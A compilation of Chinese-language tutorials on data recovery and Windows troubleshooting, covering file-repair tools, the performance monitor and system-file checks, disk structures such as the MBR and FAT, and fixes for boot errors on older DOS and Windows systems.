    第三步，开始查找已经被删除的文件和文件夹。然后显示查找结果，如图7-2-18。

     图7-2-18 显示查找结果

    第四步，选择要修复的文件，然后根据这个文件的类型从菜单项“Office File Recovery”中选择对应的恢复项目，例如Word文件对应菜单选项是“Microsoft Word File Recovery”，其他的菜单选项还有Powerpoint和Excel。

    随后出现的窗口显示该文件的基本数据，单击“下一步”，出现文件损坏程度检查窗口，单击“check rate”检查文件损坏程度，显示在右边的小窗口，窗口下部是对于损坏等级的说明，如图7-2-19，单击“下一步”。

     图7-2-19 显示文件被破坏的等级

    第五步，出现保存窗口，选择文件夹保存这个文件，勾选“Recover All Format”，单击“Start Recovery”，如图7-2-20，开始恢复文件。

     图7-2-20 保存修复的文件

    第六步，检查一下恢复以后的文件，是否信息完全正确。

    3.影像文件的修复

    常用的影像文件格式有DivX、AVI、ASF、WMV、WMA、RM等，而这些文件的恢复需要专门针对图像文件的修复软件Video Fixer，但是MPEG格式的文件无法用Video Fixer修复，可以用前面介绍的FinalData修复。

    运行Video Fixer，单击窗口左侧的第一个按钮“Add”添加要修复的影像文件，然后单击“fix”修复，窗口下方会显示修复信息和进度，如图7-2-21，最后如果修复成功就保存起来。

     图7-2-21 显示修复影像文件的进度

    4.修复MPEG1和MPEG2文件

    修复修复MPEG1和MPEG2文件仍然用FinalData，而且在选择需要修复的文件驱动器和扫描、查找方式都和修复Office文件类似，只是在选定要修复的文件以后，针对文件类型选择修复方式时，要单击 “Tools” 下的菜单项“Recover a file Partially Damaged”的子菜单“Recover MPEG File”，如图7-2-22。其余过程和修复Office文件一样。

    图7-2-22 选择修复的文件类型

    5. 修复ZIP文件

    为了节省空间，常用压缩文件的形式保存文件。而压缩文件如果出现故障，无法打开，就会造成数据损失。压缩软件本身没有提供修复功能，因此必须借助第三方软件。在这里我们推荐ZIPRepair。它修复压缩包的方式很简单，将原来无法打开的文件包中可以正常使用的数据单独拿出来另外存为一个文件，而且使用简单至极，只要单击界面窗口的“Repair Zip File”按钮，然后选择要修复的ZIP压缩包，随即开始修复，如图7-2-23。

     图7-2-23 修复ZIP文件

    6. 常见图片文件的修复

    大多数人的机器中都存储有很多精美的图片，可能是自己到处精心搜集的，或者是用数码相机拍摄，让美好的赏心悦目的瞬间感觉成为永恒。但是图片文件和其他类型的文件一样，一个误删除，或者数码相机的内存卡出现一些问题，都会让这些美丽的图片瞬间消失。所以你也需要有一个针对这些图片文件的修复工具，有备无患。

    这里向大家推荐的是Photo Recovery，以前是一个免费软件，叫做Digita Image Recovery，现在开始收费了。这可是一个功能非常强劲的修复工具，能够修复很多类型的内存卡，包括Flash Card、SmartMedia、SONY Memory Stick、IBM Micro Drive、Multimedia Card、Secure Digital Card 以及 Compact disc，而它能修复的图片文件类型包括：

    图片，有JPEG、exif、TIFF、PNG、GIF、BMP、Canon CRW；

    音乐影像文件，AVI、MOV、WAV。

    Photo Recovery修复图片文件的唯一前提是需要把数码相机的内存卡作为一个独立的驱动器。

    Photo Recovery使用非常简单，运行它并找到数码相机内存卡所在的盘符，确定要修复的文件，单击“START”，然后就是耐心等待修复结果了。

    下载地址：http://www.le-tech.com/

    Photo Recovery也有一个令人遗憾的地方，无法修复因为数据写入时数码相机断电所导致的数据丢失。因此我们另外推荐一个软件ImageRecall Lite Edition。这个软件专门修复内存卡因为读取错误而无法读取文件的情况，针对数码相机内存卡特有的问题进行修复。

    下载地址http://www.imagerecall.com/


软件故障的排困解难

《一键清理系统垃圾》

软件故障的排困解难

祖国医学讲究“望、闻、问、切”四字诀，对于Windows XP，我们也可以对其进行“望、闻、问、切”。尽管Windows的问题不少，但是常见病无非也就是以下三大类。

    1．系统资源不足

    Windows从98、2000升级如今的XP，尽管功能、稳定性得到了很大的提升，但是同时系统资源消耗也很大。尤其是还在用着古董型机器的朋友，往往会整个系统就象老牛拉破车一样，其慢无比。任何一个鼠标、键盘操作要等半天才有反应。桌面上程序的界面就好像被毁容了一样，惨不忍睹。更有甚者，系统就干脆来个蓝屏，彻底瘫痪，任你千呼万唤，就是不出来，只好重新启动了事。

    解决方法除了进行软件优化（参见本书前面的XP优化章节）外，最彻底的方法就是升级硬件了，而升级硬件无非就是升级CPU（考虑主板的支持）、内存和硬盘了。为了把钱用在刀口上，我们应该确定哪个部件才是整个系统的瓶颈。这里介绍如何用Windows XP自带的“性能”控制台来找出整个系统的薄弱环节。

    要访问Windows XP自带的“性能”控制台，可以进行以下操作步骤：

    （1）单击“开始”菜单→“运行”菜单项，即可打开“运行”对话框；

    （2）在“运行”对话框里输入perfmon.msc并回车，即可打开“性能”管理单元窗口，如图3-1所示。

    图3-1 “性能”控制台

    可以看到里面默认有三个计数器，分别监视这三个设备参数：

    （1）％Processor Time：测试CPU响应系统请求所化的时间百分比。

    （2）％Pages/Sec：每秒钟发生的页面错误的次数，也就是所请求的页不在内存中，而需要到硬盘里去读取的计数。

    （3）％Disk Time：硬盘忙于为读或写入请求提供服务所用时间的百分比。

    除了这三个默认的计数器之外，我们还可以添加别的计数器，以得到更加详细的性能评估结果：

    （1）单击如图3-1所示窗口右侧的“添加”按钮 ，即可打开如图3-2所示的“添加计数器”对话框；

    图3-2 添加计数器

    （2）在“性能对象”下拉列表框里指定所需检测的性能对象，并选定某个或者全部适用的计数器，然后单击“添加”按钮；

    （3）继续添加计数器，最后单击“关闭”按钮关闭对话框。

    现在“血检化验单”已经出来了，但总得读懂它呀，这样才能找出系统性能瓶颈的所在。下面对所监视的性能对象作分别阐述：

    （1）处理器：通常不会成为系统瓶颈。可以用一些比较耗处理器的活动来验证一下，比如说打开一个3D的屏幕保护程序（或者干脆运行一些CPU测试工具），可以看到“％Processor Time”计数器迅速达到峰值。如果“％Processor Time”计数器经常大于80％才会考虑可能有处理器瓶颈，如果Interrupt/Sec计数器经常高于3500，则要考虑可能是程序或硬件有问题，以至于产生大量的“伪中断”。

    （2）内存：最有可能造成系统瓶颈，如果内存容量太低，则需要经常读写硬盘，大家都知道，硬盘速度远低于内存，从而导致整个系统性能低下。可以用一些活动来验证，比如说打开一个WORD文档，然后关闭再打开，可以发现第一次打开时，“Pages/Sec”计数器达到峰值，第二次则要低得多，这是因为首次打开WORD文档需要从硬盘读取，而第二次则只需从内存读取，前后两次的Available Mbytes计数器值应该差不多。如果Available Mbytes的值经常小于4兆，则需要增加内存，而Pages/Sec的值应该小于20，最好是在4到5之间（看看你的电脑，是不是这个数值？）。

    （3）硬盘：可以用一些引起磁盘活动的事件来验证，比如说在不同分区之间粘贴、拷贝一些文档，如果％Disk Time计数器的平均值小于90％、而Avg.Current Disk Queue Length计数器的平均值小于2，则说明没有对硬盘产生过量请求。

    使用“性能日志与警报”，还可以连续监视一段时间系统性能的变化，还可以设置当某一监视对象的计数器达到阀值时发出警报。有了“性能”控制台，相信大家一定可以用最少的钱获得最大的性能！

    2．系统文件破坏

    尽管微软吹嘘Windows XP是有史以来最稳定的视窗操作系统，这话倒不是在夸张，因为Windows XP采用了系统文件保护机制。然而，Windows XP并非固若金汤，尽管不象它的前辈Windows 98一样经常板个“蓝脸”给你看，但是一旦摊上了这种倒霉事也不是闹着玩的。常见问题有：

    （1）丢失了重要的系统文件，比如一些动态链接库文件等，造成系统不稳定。

    （2）有些朋友为了节省磁盘空间，用sfc /PURGECACHE清空系统文件保护缓存，从而导致系统文件被误删、替换等。

    我们可以在DOS命令行窗口输入“SFC /scannow”命令并回车对当前的系统文件进行扫描，并根据屏幕提示插入Windows XP安装光盘。一旦发现哪个文件的数字签名被破坏，即可进行恢复。

    如果知道哪个系统文件被破坏，还可以用“系统配置实用程序”来提取指定的文件，比如说查出系统文件Cfgmgr32.dll（位于C:WINDOWSSystem32目录）丢失了，可以采用以下方法进行恢复：

    （1）单击“开始”菜单→“运行”菜单项，即可打开“运行”对话框；

    （2）在“运行”对话框里输入msconfig.exe并回车，即可打开“系统配置实用程序”窗口；

    （3）切换到“常规”标签页，然后单击“展开文件”按钮；

    （4）在弹出的“从安装源位置展开一个文件”对话框里，在“要还原的文件”文本框里输入文件名cfgmgr32.dll，在“还原自”文本框里输入安装光盘路径“X:I386”（此处的X用光驱盘符代替），在“保存文件到”文本框里输入文件的还原位置“C:WINDOWSSystem32”，然后单击“展开”按钮即可。

    图3-3 用msconfig提取系统文件

    3．注册表破坏

    Windows XP的注册表被破坏主要发生在手动修改注册表的时候，大家知道Windows XP的注册表编辑器的功能很弱，其自带的备份/恢复功能并不尽如人意，所以我们必须借助本书第二章所介绍的方法对注册表进行备份，除此之外，还可以利用一些第三方注册表编辑器，这里给大家推荐一款Resplendent Registrar。

    除了具有更强的搜索、拷贝、粘贴、拖曳功能之外，Resplendent Registrar还可以像Microsoft Office一样可以撤销以前的操作。每一次创建、删除注册表键值的操作都会被Resplendent Registrar记录。单击程序窗口上的“撤销”菜单→“撤销历史”菜单项，即可打开“撤销历史”对话框，在这里我们可以看到以前所作的每一步修改，如果想要恢复，只需单击工具栏上的“撤销”按钮即可。


我拿什么拯救你，我的数据

《一键清理系统垃圾》

我拿什么拯救你，我的数据

去年的这个时候我还在厦门，一次用PQ调整分区时遇到了停电，当时我的第一反映是胸口一阵剧痛晕死过去，大约过了n秒后醒了过来（n>1,n取自然数），当时硬盘里可有2年来积累的全部办公资料，最晕的是这些资料没有任何备份。

    来电了，正如我预料的那样Win2000不能启动了，人倒霉的时候喝凉水都塞牙啊，拿出系统维护光盘，设CD-ROM为boot First 启动了计算机，PQ报错几次之后只能看到一片黄颜色的色条，分区一个都不见了，Diskgen2.0的重建分区表也不管用了，用2000/xp的启动光盘一个硬盘只剩一个未知分区，恰恰这个位置分区的大小就是这个硬盘的大小，其他类似软件试遍了！就是没有半点希望……我绝望了，心都凉了！冥思苦想了半天，又跑到附近的网吧去查资料，查找数据恢复的相关软件直到看到如下的介绍：

    如果你不慎使用了Shift＋Del组合键删除了不该删除的文件，或者对硬盘进行了格式化或删除分区的操作，发现里面还有重要　资料没备份，怎么才能恢复资料呢。用于恢复误删除，RecoverNT, Recover4all,lost&found, 和EasyRecovery 都比较有名，但是　 FinalData使用非常简单，功能极其强大。与同类软件相比，在恢复效果上，可以说是更胜一筹。它还可以恢复你的数据，主引导记录(MBR)，引导扇区，FAT。它能找回其他类似工具所找不到的，安全，快速，专业！

    超级数据恢复工具的特性功能包括：支持FAT16/32和NTFS，恢复完全删除的数据和目录，恢复主引导扇区和FAT表损坏丢失的数据，恢复快速格式化的硬盘和软盘中的数据，恢复CIH破坏的数据，恢复硬盘损坏丢失的数据，通过网络远程控制数据恢复等等。

    FinalData 是个韩国产品。试用过后，绝对非常不错，查找速度极快！全面支持各种类型的数据文件（包括中、日、韩等双字节文件及Oracle等数据库文件）的恢复，运行在Windows 95/98/ME、Windows NT/2000、Macintosh、Linux和UNIX上的各种版本适应不同需求。

    最新版本更是有了很大的增强，完全兼容支持 Windows 操作系统，加入恢复 CD-ROM 数据的功能，MPEG1/MPEG2 文件修复，M$ Office 文件，Email 修复，还可以修复 ORACLE 输出文件等等。

    幸好我的文档当初设置在E盘，恰好全部资料都在文档里，这是我唯一庆幸的地方！说干就干，死马当活马医，用2000的安装盘把“未知分区”删掉，怕伤及数据开始的C盘尽可能的小，我分了1.2G，余下的空间我就不分区了，在万般焦急中安装好Win2000，架上半死不活的小猫到http://soft.ttdown.com/ViewDownURL.asp?softID=3780　 Down回了FinalData，安装完毕如下图所示打开物理硬盘，（注：如果你有条件的话把这块硬盘挂到其他电脑上再进行恢复，这样更有把握！）FinalData果然身手不凡，找回了丢掉的三个分区，数据一个不落的找了回来，还顺便找回了硬盘里的软件，且全部按原来的目录结构找回来的！当然今天在这个不能时光倒流，让大家看到当初的情形，我只能按类似方法操作一次，让新手掌握一下数据灾难恢复的步骤！也起抛砖引玉的作用！

    FinalData2.0企业版安装步骤略……………………

    选择文件/打开/物理驱动器！
    FinalData在查找分区信息！

    打开控制面板/管理工具对比一下！

    来选择一个现在已经不在的分区看看！
  当然每个每个扇区的去找是很费时间的，大家要有耐心！

    以上是再现当初拯救数据的几个步骤，很简单吧！

一、基本常识

    1、保护现场
    保护现场是确保恢复成功的关键。如果磁盘空间被覆盖，是无法恢复的。
    2、不要直接在软盘上文件操作
    不少人过于相信软盘的安全性。
    3、数据文件不要太大。
    数据文件太大，对于不同的存储介质是不一样的。
    硬盘由于相对较稳定，可以存储较大的文件。文件太大是指在100M以上的文件。
    对于CD-R或CD-W，30M以上算是大文件。
    对于1.44M硬盘，200K就已经是大文件了。
    大文件，最好先压缩，或者多格式存储。

    二、硬盘恢复技术

    1、保护现场
    ①不要往目标硬盘复制文件
    ②不要往目标硬盘安装软件
    ③如果是系统分区（一般就是C盘）上文件丢失，则立即关机，不要再打开。这是因为默认的虚拟内存，以及临时文件都在系统分区上，它们可能会覆盖丢失文件占据的空间。
    ④硬盘分区剩余空间不要少于回收站对该分区的分配值。一般默认为该分区容量的10%。
    ⑤除非已经确保丢失的文件已经找回，不要对目标硬盘进行写操作。

    现在开始一个普通的数据误删除恢复的步骤：
  来到了这一步，这一步是只因查找正常数据和MFT区所以很快！

  来到簇扫描这一步！确保安全请选择这一步！
完成后的情况！是不是好想见到了资源管理器一样，恐怕这是其他数据恢复软件难以望其项背的地方，能找回完整的目录和文件名！
  选择保存...........
注意事项.............
  到这里数据恢复已经完成了，再简单介绍一下其他功能！
  文件夹保护功能也很有特色
至于Office文件恢复、电子邮件恢复大家自己试试就知道了

    再附上：数据保护常识

    1.定期使用Vopt99、Defrag、Norton Speed 、Diskeeper等磁盘碎片整理优化工具整理你的硬盘数据，可以提高硬盘访问速率。 这样即使发生不测，也可提高你的数据文件恢复的概率。

    2.硬盘是机电一体化的精密机器，应轻拿轻放，在主机内应固定好。 开机后绝对不能移动，关机1分钟硬盘马达停转后，方可进行搬动。不正常关机可能会损坏硬盘。

    3.正常硬盘运行时噪声很小。若你的硬盘运行时的声响较大或不正常，这一般是故障的前兆，此时宜及时备份重要数据以防不测。

    4.使用GHOST作恢复分区时，一定要选对目标分区，否则可能导致分区丢失或重要数据不能恢复。建议恢复分区前，对分区加Label,这样能分清目标分区，不会导致你选错目标分区造成不必要的损失。

    5.要充分利用分区的特性，数据文件一般不要放在C区，因为C区属事故多发区。


硬盘数据拯救全攻略

《一键清理系统垃圾》

硬盘数据拯救全攻略

为了有效地保存硬盘中的数据，除了经常性地进行备份工作以外，还要学会在硬盘出现故障时如何救活硬盘，或者从坏的区域中提取出有用的数据，把损失降到最小程度。

系统不认硬盘

系统从硬盘无法启动，从A盘启动也无法进入C盘，使用CMOS中的自动监测功能也无法
发现硬盘的存在。这种故障大都出现在连接电缆或IDE端口上，硬盘本身故障的可能性不大，可通过重新插接硬盘电缆或者改换IDE口及电缆等进行替换试验，就会很快发现故障的所在。如果新接上的硬盘也不被接受，一个常见的原因就是硬盘上的主从跳线，如果一条IDE硬盘线上接两个硬盘设备，就要分清楚主从关系。

CMOS引起的故障

CMOS中的硬盘类型正确与否直接影响硬盘的正常使用。现在的机器都支持“IDE Auto Detect”的功能，可自动检测硬盘的类型。当硬盘类型错误时，有时干脆无法启动系统，有时能够启动，但会发生读写错误。比如CMOS中的硬盘类型小于实际的硬盘容量，则硬盘后面的扇区将无法读写，如果是多分区状态则个别分区将丢失。还有一个重要的故障原因，由于目前的IDE都支持逻辑参数类型，硬盘可采用“Normal,LBA,Large”等，如果在一般的模式下安装了数据,而又在CMOS中改为其它的模式，则会发生硬盘的读写错误故障，因为其映射关系已经改变，将无法读取原来的正确硬盘位置。

主引导程序引起的启动故障
主引导程序位于硬盘的主引导扇区，主要用于检测硬盘分区的正确性，并确定活动分区，负责把引导权移交给活动分区的DOS或其他操作系统。此段程序损坏将无法从硬盘引导，但从软驱或光驱启动之后可对硬盘进行读写。修复此故障的方法较为简单，使用高版本DOS的FDISK最为方便，当带参数/mbr运行时，将直接更换(重写)硬盘的主引导程序。实际上硬盘的主引导扇区正是此程序建立的，FDISK.EXE之中包含有完整的硬盘主引导程序。虽然DOS版本不断更新，但硬盘的主引导程序一直没有变化，从DOS 3.x到Windos 95的DOS，只要找到一种DOS引导盘启动系统并运行此程序即可修复。

分区表错误引发的启动故障

分区表错误是硬盘的严重错误，不同的错误程度会造成不同的损失。如果是没有活动分区标志，则计算机无法启动。但从软驱或光驱引导系统后可对硬盘读写，可通过FDISK重置活动分区进行修复。

如果是某一分区类型错误，可造成某一分区的丢失。分区表的第四个字节为分区类型值，正常的可引导的大于32MB的基本DOS分区值为06，而扩展的DOS分区值是05。很多人利用此类型值实现单个分区的加密技术，恢复原来的正确类型值即可使该分区恢复正常。

分区表中还有其它数据用于记录分区的起始或终止地址。这些数据的损坏将造成该分区的混乱或丢失，可用的方法是用备份的分区表数据重新写回，或者从其它的相同类型的并且分区状况相同的硬盘上获取分区表数据。

恢复的工具可采用NU等工具软件，操作非常方便。当然也可采用DEBUG进行操作，但操作繁琐并且具有一定的风险。

      精彩推荐


分区有效标志错误的故障

《一键清理系统垃圾》

分区有效标志错误的故障

在硬盘主引导扇区中还存在一个重要的部分，那就是其最后的两个字节：“55aa”，此字节为扇区的有效标志。当从硬盘、软盘或光盘启动时，将检测这两个字节，如果存在则认为有硬盘存在，否则将不承认硬盘。此处可用于整个硬盘的加密技术，可采用DEBUG方法进行恢复处理。另外，当DOS引导扇区无引导标志时，系统启动将显示为：“Mmissing Operating System”。方便的方法是使用下面的DOS系统通用的修复方法。

DOS引导系统引起的启动故障

DOS引导系统主要由DOS引导扇区和DOS系统文件组成。系统文件主要包括IO.SYS、MSDOS.SYS、COMMAND.COM，其中COMMAND.COM是DOS的外壳文件，可用其它的同类文件替换，但缺省状态下是DOS启动的必备文件。在Windows 95携带的DOS系统中，MSDOS.SYS是一个文本文件，是启动Windows必须的文件，但只启动DOS时可不用此文件。DOS引导出错时，可从软盘或光盘引导系统后使用SYS C:命令传送系统，即可修复故障，包括引导扇区及系统文件都可自动修复到正常状态。

FAT表引起的读写故障

FAT表记录着硬盘数据的存储地址，每一个文件都有一组FAT链指定其存放的簇地址。FAT表的损坏意味着文件内容的丢失。庆幸的是DOS系统本身提供了两个FAT表，如果目前使用的FAT表损坏，可用第二个进行覆盖修复。但由于不同规格的磁盘其FAT表的长度及第二个FAT表的地址也是不固定的，所以修复时必须正确查找其正确位置，一些工具软件如NU等本身具有这样的修复功能，使用也非常的方便。采用DEBUG也可实现这种操作，即采用其m命令把第二个FAT表移到第一个表处即可。如果第二个FAT表也损坏了，则也无法把硬盘恢复到原来的状态，但文件的数据仍然存放在硬盘的数据区中，可采用CHKDSK或SCANDISK命令进行修复，最终得到*.CHK文件，这便是丢失FAT链的扇区数据。如果是文本文件则可从中提取出完整的或部分的文件内容。

目录表损坏引起的引导故障

目录表记录着硬盘中文件的文件名等数据，其中最重要的一项是该文件的起始簇号。目录表由于没有自动备份功能，所以如果目录损坏将丢失大量的文件。一种减少损失的方法也是采用CHKDSK或SCANDISK程序恢复的方法，从硬盘中搜索出*.CHK文件，由于目录表损坏时仅是首簇号丢失，每一个*.CHK文件即是一个完整的文件，把其改为原来的名字即可恢复大多数文件。

误删除分区时数据的恢复

当用FDISK删除了硬盘分区之后，表面上是硬盘中的数据已经完全消失，在未格式化时进入硬盘会显示为无效驱动器。如果了解FDISK的工作原理，就会知道FDISK只是重新改写了硬盘的主引导扇区(0面0道1扇区)中的内容，具体说就是删除了硬盘分区表信息，而硬盘中的任何分区的数据均没有改变。可仿照上述的分区表错误的修复方法，即想办法恢复分区表数据即可恢复原来的分区及数据。如果已经对分区格式化，在先恢复分区后，可按下面的方法恢复分区数据。

误格式化硬盘数据的恢复

在DOS高版本状态下，FORMAT格式化操作在缺省状态下都建立了用于恢复格式化的磁盘信息，实际上是把磁盘的DOS引导扇区、FAT分区表及目录表的所有内容复制到了磁盘的最后几个扇区中(因为后面的扇区很少使用)，而数据区中的内容根本没有改变。这样通过运行UNFORMAT命令即可恢复。另外DOS还提供了一个MIROR命令用于记录当前磁盘的信息，供格式化或删除之后的恢复使用，此方法也比较有效。


硬盘数据恢复入门教程

《一键清理系统垃圾》

硬盘数据恢复入门教程

初买来一块硬盘，我们是没有办法使用的，你需要将它分区、格式化，然后再安装上操作系统才可以使用。一个完整硬盘的数据应该包括五部分：MBR，DBR，FAT，DIR区和DATA区。其中只有主引导扇区是唯一的，其它的随你的分区数的增加而增加。

主引导扇区

主引导扇区位于整个硬盘的0磁道0柱面1扇区，包括硬盘主引导记录MBR（Main Boot Record）和分区表DPT（Disk Partition Table）。其中主引导记录的作用就是检查分区表是否正确以及确定哪个分区为引导分区，并在程序结束时把该分区的启动程序（也就是操作系统引导扇区）调入内存加以执行。至于分区表，很多人都知道，以80H或00H为开始标志，以55AAH为结束标志，共64字节，位于本扇区的最末端。值得一提的是，MBR是由分区程序（例如DOS 的Fdisk.exe）产生的，不同的操作系统可能这个扇区是不尽相同。如果你有这个意向也可以自己去编写一个，只要它能完成前述的任务即可，这也是为什么能实现多系统启动的原因（说句题外话:正因为这个主引导记录容易编写，所以才出现了很多的引导区病毒）。

操作系统引导扇区

OBR（OS Boot Record）即操作系统引导扇区，通常位于硬盘的0磁道1柱面1扇区（这是对于DOS来说的，对于那些以多重引导方式启动的系统则位于相应的主分区/扩展分区的第一个扇区），是操作系统可直接访问的第一个扇区，它也包括一个引导程序和一个被称为BPB（BIOS Parameter Block）的本分区参数记录表。其实每个逻辑分区都有一个OBR，其参数视分区的大小、操作系统的类别而有所不同。引导程序的主要任务是判断本分区根目录前两个文件是否为操作系统的引导文件（例如MSDOS或者起源于MSDOS的Win9x/Me的IO.SYS和MSDOS.SYS）。如是，就把第一个文件读入内存，并把控制权交予该文件。BPB参数块记录着本分区的起始扇区、结束扇区、文件存储格式、硬盘介质描述符、根目录大小、FAT个数、分配单元（Allocation Unit，以前也称之为簇）的大小等重要参数。OBR由高级格式化程序产生（例如DOS 的Format.com）。

文件分配表

FAT(File Allocation Table)即文件分配表，是DOS/Win9x系统的文件寻址系统，为了数据安全起见，FAT一般做两个，第二FAT为第一FAT的备份, FAT区紧接在OBR之后，其大小由本分区的大小及文件分配单元的大小决定。关于FAT的格式历来有很多选择，Microsoft 的DOS及Windows采用我们所熟悉的FAT12、FAT16和FAT32格式，但除此以外并非没有其它格式的FAT，像Windows NT、OS/2、UNIX/Linux、Novell等都有自己的文件管理方式。

目录区

DIR是Directory即根目录区的简写，DIR紧接在第二FAT表之后,只有FAT还不能定位文件在磁盘中的位置，FAT还必须和DIR配合才能准确定位文件的位置。DIR记录着每个文件（目录）的起始单元（这是最重要的）、文件的属性等。定位文件位置时，操作系统根据DIR中的起始单元，结合FAT表就可以知道文件在磁盘的具体位置及大小了。在DIR区之后，才是真正意义上的数据存储区，即DATA区。

数据区

DATA虽然占据了硬盘的绝大部分空间，但没有了前面的各部分，它对于我们来说，也只能是一些枯燥的二进制代码，没有任何意义。在这里有一点要说明的是，我们通常所说的格式化程序（指高级格式化，例如DOS下的Format程序），并没有把DATA区的数据清除，只是重写了FAT表而已，至于分区硬盘，也只是修改了MBR和OBR，绝大部分的DATA区的数据并没有被改变，这也是许多硬盘数据能够得以修复的原因。但即便如此，如MBR/OBR/FAT/DIR之一被破坏的话，也足够咱们那些所谓的DIY老鸟们忙乎半天了……需要提醒大家的是，如果你经常整理磁盘，那么你的数据区的数据可能是连续的，这样即使MBR/FAT/DIR全部坏了，我们也可以使用磁盘编辑软件（比如DOS下的DiskEdit），只要找到一个文件的起始保存位置，那么这个文件就有可能被恢复（当然了，这需要一个前提，那就是你没有覆盖这个文件……）。

硬盘分区方式

我们平时说到的分区概念，不外乎三种:主分区、扩展分区和逻辑分区。主分区是一个比较单纯的分区，通常位于硬盘的最前面一块区域中，构成逻辑C磁盘。在主分区中，不允许再建立其它逻辑磁盘。

扩展分区的概念则比较复杂，也是造成分区和逻辑磁盘混淆的主要原因。由于硬盘仅仅为分区表保留了64个字节的存储空间，而每个分区的参数占据16个字节，故主引导扇区中总计可以存储4个分区的数据。操作系统只允许存储4个分区的数据，如果说逻辑磁盘就是分区，则系统最多只允许4个逻辑磁盘。对于具体的应用，4个逻辑磁盘往往不能满足实际需求。为了建立更多的逻辑磁盘供操作系统使用，系统引入了扩展分区的概念。

所谓扩展分区，严格地讲它不是一个实际意义的分区，它仅仅是一个指向下一个分区的指针，这种指针结构将形成一个单向链表。这样在主引导扇区中除了主分区外，仅需要存储一个被称为扩展分区的分区数据，通过这个扩展分区的数据可以找到下一个分区（实际上也就是下一个逻辑磁盘）的起始位置，以此起始位置类推可以找到所有的分区。无论系统中建立多少个逻辑磁盘，在主引导扇区中通过一个扩展分区的参数就可以逐个找到每一个逻辑磁盘。

需要特别注意的是，由于主分区之后的各个分区是通过一种单向链表的结构来实现链接的，因此，若单向链表发生问题，将导致逻辑磁盘的丢失。

既然要进行数据的恢复，当然数据的存储原理我们不能不提，在这之中，我们还要介绍一下数据的删除和硬盘的格式化相关问题……

文件的读取

操作系统从目录区中读取文件信息（包括文件名、后缀名、文件大小、修改日期和文件在数据区保存的第一个簇的簇号），我们这里假设第一个簇号是0023。

操作系统从0023簇读取相应的数据，然后再找到FAT的0023单元，如果内容是文件结束标志（FF），则表示文件结束，否则内容保存数据的下一个簇的簇号，这样重复下去直到遇到文件结束标志。

文件的写入

当我们要保存文件时，操作系统首先在DIR区中找到空区写入文件名、大小和创建时间等相应信息，然后在Data区找到闲置空间将文件保存，并将Data区的第一个簇写入DIR区，其余的动作和上边的读取动作差不多。

文件的删除

Win9x的文件删除工作却是很简单的，简单到只在目录区做了一点小改动——将目录区的文件的第一个字符改成了E5就表示将改文件删除了。


数据恢复的方法

《一键清理系统垃圾》

数据恢复的方法

1、 硬件或介质问题的情况

①、 硬盘坏：硬盘自检不到的情况一般是硬件故障，又可分为主板的硬盘控制器（包括IDE口）故障和硬盘本身的故障。如果问题在主板上，那么数据应当没有影响。如果出在硬盘上，也不是一定不能修复。 硬盘可能的故障又可能在控制电路、电机和磁头以及盘片。如果是控 制电路的问题，一般修好它，就可以读出数据。但如果电机、磁头和盘片故障，即使修理也要返回原厂，数据恢复基本没有可操作性。

②、 软盘坏：当软盘数据损坏时，可以有几种处理，一种是用NDD修复，他会强制读出你坏区中的东西，MOVE 到空白扇区中，这就意味着 如果你的磁盘很满操作是没法进行的。你也可以用HDCOPY2.0以上版本READ软盘，他也会进行强读，使读入缓冲区的数据是完好的，你再写入一张好磁盘就可以了。当然这些方式，要看盘坏的程度。如果0磁道坏，数据也并非无法抢救，早先可以通过扇区读的方式，把后面的数据读出，不过一般来说，你依然可以HDCOPY来实验。

2、系统问题的情况

①、 在硬盘崩溃的情况下，我们经常要和一些提示信息打交道。我们要了解他典型提示信息的含义，注意这些原因仅仅分析逻辑损坏而不是 硬盘物理坏道的情况。
提示信息
可能原因
参考处理
Invalid Partition Table
分区信息中1BE、1CE、1DE处不符合只有一个80而其他两处为0用工具设定，操作在前面已经讲了。
Error Loading Operating System
主引导程序读BOOT区5次没成功。
重建BOOT区
Missing Operating System DOS
引导区的55AA标记丢失
用工具设定，把前面读写主引导区程序的DX=80改为180即可
Non-System Disk or Disk Error
BOOT区中的系统文件名与根目录中的前两个文件不同
SYS命令重新传递系统，
Disk Boot Failure
读系统文件错误 SYS命令重新传递系统，
Invalid Driver Specifcationg

如果试图切换到一个确实存在的逻辑分区出现以下信息，说明主分区表的分区记录被破坏了。

根据各分区情况重建分区表，或者用自动修复工具修复。注意分区丢失是最常见的故障之一，此时不要紧张，一般的说此时数据并没有问题，如果你不了解处理的方法。你可以选择我前面介绍的自动修复分区工具进行处理，他们大多只改写主分区表的数据区，不会影响你的其他数据。特别提醒大家，这些工具有的不支持 8.4G硬盘，有的与BIOS对硬盘的识别有关系。如果你 在一台机器上不行，可以换台BIOS不同的机器实验一下。

Bad or missing command interpreter 这是说找不到COMMAND.com，或者COMMAND文件坏了。
如果你COPY过去COMMAND文件还是如此，一般来说是 感染了某种病毒。
Invalid media type reading drive X ,Abort,Retry,Fail?
该盘没有高级格式化，或BOOT区中I/O参数表被破坏。
这里情况较多，手工处理比较复杂，特别指出，此时 DISKEDIT可能无法运行，建议用工具修复。
Incorrect DOS Version
可能是文件版本不统一，对9X来说，有95 95osr/2,98,98 oem/2等版本，重新SYS时，不要弄错了。
用正确版本的启动盘重新SYS系统另外说明一下，对于比较老的机器还有1071和not found rom basic、ROM BASIC OK 等提示，在目前机器中以消失。另外，当代码区完全被破坏的情况下，系统关于无系统的提示是来自BIOS的，这条提示与BIOS的种类有关。另外，FDISK/MBR对代码区的 重建是我们经常采用的。再介绍一种比较极端的情况，就是硬盘 自检正常，而用软盘和硬盘都无法正常启动的情况，这可能是， 病毒或恶意程序利用，DOS3以上版本启动中都要检索分区表这一特点，把分区表置为死循环。造成启动中死机。网上曾经流传过 DOS6.22k修改方案，其实是修改西文MS-DOS6.22的IO.SYS，把 C2 03 06 E8 0A 00 07 72 03替换为：C2 03 90 E8 0A 00 72 80 90就可以启动被类似情况锁住的硬盘。

②、 9X无法正常进入或工作：以下仅仅是对可能的软故障分析 ，没有考虑硬件故障.进入图形界面前死机情况比较复杂，可能与加载的某些驱动有关 可以在START MS WINDOWS时，用F8激活菜单，设置为step by step ，看是哪项使系统死机。而后从CONFIG或者SYSTEM。INI中删除进入图形界面后死机一般这与开机加载的程序有关进入安全模式（此时自动运行的程序将不能加载），对注册表中的 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run* 中的键值和启动组中加载的程序进行分析。必要的予以删除。显示IEXPLORE.EXE错误，不能进行任何操作
可能有某个系统的动态连接库损坏覆盖安装WIN9X，或从其他机器上COPY损坏的连接库。（确定哪个库损坏一般比较困难）
频繁出现出错各种信息
